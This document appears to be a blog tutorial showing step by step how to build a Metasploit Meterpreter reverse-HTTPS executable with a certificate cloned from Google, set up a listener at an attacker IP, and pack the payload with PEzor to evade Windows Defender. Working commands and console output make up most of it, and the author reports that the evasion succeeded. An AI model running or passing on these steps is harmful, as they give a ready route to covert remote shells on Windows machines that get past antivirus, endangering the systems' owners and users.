So, just a short piece on using spoofed SSL certificates with Metasploit and Meterpreter payloads.
Why use spoofed certs ? Because they help us evade some of the security features in Windws, especially when meterpreter stages loads, if we don't encrypt the stage loader, AV will catch us and it's game over. And it's not complicated to to, so we might as well do it. This is a fast track solution, not a walktrough on on using the Metasploit Framework, since it's rather large and pretty complicated, so it's best suited for a theme series..
For at complete walktrough on Metasploit, look here https://www.offensive-security.com/metasploit-unleashed/
Also for an introduction to PEzor, see this article PEzor
There's a couple of other tools I would like to mention, Scarecrow, Ivy and Limelighter.
They are for filespoofing, so exe files is signed with false certificates, so they look like coming from a trusted source, but at the time of writing, they have not been tested in combination with PEzor payloads. Dedicated pieces on all of these tools will follow in time, so stay tuned.
But, how do we start ?. Here I've chosen to use the Metasploit Console, because it's the easiest to navigate when you're new to Metasploit. So opoen up a terminal and launch it as root.
msfconsoleNow, the Metasploit Framework console looks like this.
=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 618 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
[*] Starting persistent handler(s)...
msf6 >
To generate a payload we have a couple of options, normal shell, and reverse shell. Since we're using reverse shell, we also need a listener, but we'll get back to that. Payload generation is our first task at hand, so let's search a meterpreter. There's 200+ to choose from for different platforms, staged and unstaged, so choose your poison carefully :)
Now, what on earth is staged and unstaged payloads ?. Staged means that the payload that hit's the target first is only a small loader code that will call home, and download the rest of the shellcode, these are handy for their small size, so try them out.
The next type is unstaged, they contain it all in one package, so they are somewhat larger then staged payloads. Here I'm using an unstaged payload for testing.
# staged payload (Note the / between meterpreter and reverse_tcp ?
# That is a sign of a staged payload, the type being a reverse_tcp payload.
181 payload/windows/meterpreter/reverse_tcp
# Unstaged payload. Notice it says platform/type, this being a reverse_tcp_meterpreter
# All types in _ is unsaged payloads.
223 payload/windows/meterpreter_reverse_tcp
# All payloads start with payload/platform/typeSince we're playing with spoofed SSL let's list payload options. We have a payload called "payload/windows/meterpreter_reverse_https", that's a likely candidate, so let's read more about it with this command.
msf6 > info payload/windows/meterpreter_reverse_https
Name: Windows Meterpreter Shell, Reverse HTTPS Inline
Module: payload/windows/meterpreter_reverse_https
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 176220
Rank: Normal
Provided by:
OJ Reeves
sf <This email address is being protected from spambots. You need JavaScript enabled to view it.>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell. Requires
Windows XP SP2 or newer.
We see we need to set LHOST and LPORT, and for ssl we need some extra options, stagerverifysslcert=true and HANDLERCERT=sppofed_cert.pem.
So, let's set the payload, and we do that like so
# Choose payload.
msf6 > use payload/windows/meterpreter_reverse_https
# Payload set, notice the changed prompt.
msf6 payload(windows/meterpreter_reverse_https) >Now, list the ooptions of the payload.
msf6 payload(windows/meterpreter_reverse_https) > show options
Module options (payload/windows/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
# Show advanced options for the payload
show advanced
Module advanced options (payload/windows/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
# Note there are a lot more optins in advanced settings, but we only need to set these two, and the standard LPORT & LHOST.Now, we need a certificate first, so let's create one before we return to the payload and listener. We do hat with the aux module impersonate_ssl
msf6 payload(windows/meterpreter_reverse_https) > search SSL
Matching Modules
================
auxiliary/gather/impersonate_ssl
# Let's se some info
msf6 payload(windows/meterpreter_reverse_https) > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > show options
Module options (auxiliary/gather/impersonate_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
ADD_CN no Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT no CA Public certificate
EXPIRATION no Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT PEM yes Output format (Accepted: DER, PEM)
PRIVKEY no Sign the cert with your own CA private key
PRIVKEY_PASSWORD no Password for private key specified in PRIV_KEY (if applicable)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SNI no Server Name Indicator
To target a Google cert, we run it with
set RHOST www.google.com
RHOST => www.google.com
msf auxiliary(impersonate_ssl) > runIt's going to save the certificate in /home/USER/.msf4/loot/some_file.pem. Remember that file location, since we'll need it later. My cert saved to this file for testing.
/root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
So, now we have a certificate fiile, we can start buiilding our payload, so we set it again.
use windows/meterpreter_reverse_https
show options
set LHOST <YOUR_IP_TO KALI_WORKSTATION>
# My setup for the test
set LHOST 10.0.0.52
set LPORT 8443
# SSL Cert options
set stagerverifusslcert true
stagerverifusslcert => true
set HANDLERSSLCERT /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
HANDLERSSLCERT => /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
# Confirm advanced settings
show advanced
Now we get to the fun part, building the payload file. We can do that with the generate command.
generate -t exe -f /home/USERNAME/payload1.exeTo get help with the generate command, run generate -h
generate -f exe -o /home/nx/met_srv_rev_https_8443.exe
[*] Writing 251392 bytes to /home/nx/met_srv_rev_https_8443.exe...
So, now we have a reverse_connect meterpreter, but we haven't gotten a listener yet, so let's set one up.
use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
set LHOST 10.0.0.52
LHOST => 10.0.0.52
set LPORT 8443
LPORT => 8443
set HANDLERSSLCERT 20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
HANDLERSSLCERT => 20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
set stagerverifyssl true
stagerverifyssl => true
msf6 exploit(multi/handler) >
That's it, we done building the payload and setting up the listener in Metasploit. Now we could run the listener with
exploit -j BUT, Antivirus / Windows Defender would catch us right away. Now, for the fun part, enter PEzor... !!
Open another terminal, and let's take it for a spin, to see if it can help us evade AV.
First you might need to change permissions on the payload, I always do, to make sure permissions are not triping anything up, causing the tools to fail for some reason.
┌──(root💀cray)-[/home/nx]
└─# chmod 777 met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─# chmod +x met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─# chown nx:users met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─#
Now, we have a 32Bit payload meterpreter, remember that, since it's important to tell PEzor about it, using the -32 parameter.
/home/nx/Hentet/PEzor/PEzor.sh -32 -sgn -unhook -antidebug -text -sleep=10 -format=exe /home/nx/met_srv_rev_https_8443.exeSo, that should give us a payload file build with PEzor, fire up a Windows machine, and start the listener, and see if it connects back.
I testet the MSF payload before PEzor, and it got caught by Defender, after PEzor, it didn't get caught, so it works (for now anyway).
Much Happy Hacking